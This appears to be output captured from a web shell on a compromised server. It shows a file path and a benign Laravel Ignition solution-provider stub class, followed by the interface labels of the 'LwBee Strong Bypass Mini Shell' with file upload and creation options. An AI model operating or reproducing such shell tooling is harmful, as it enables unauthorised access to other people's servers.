/home/aloic1/public_html/core/vendor/facade/ignition/src/Commands/stubs/solution-provider.stub
<?php

namespace DummyNamespace;

use Facade\IgnitionContracts\HasSolutionsForThrowable;

class DummyClass implements HasSolutionsForThrowable
{
    public function canSolve(): bool
    {
        return false;
    }

    public function getSolutions(): array
    {
        return [];
    }
}
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File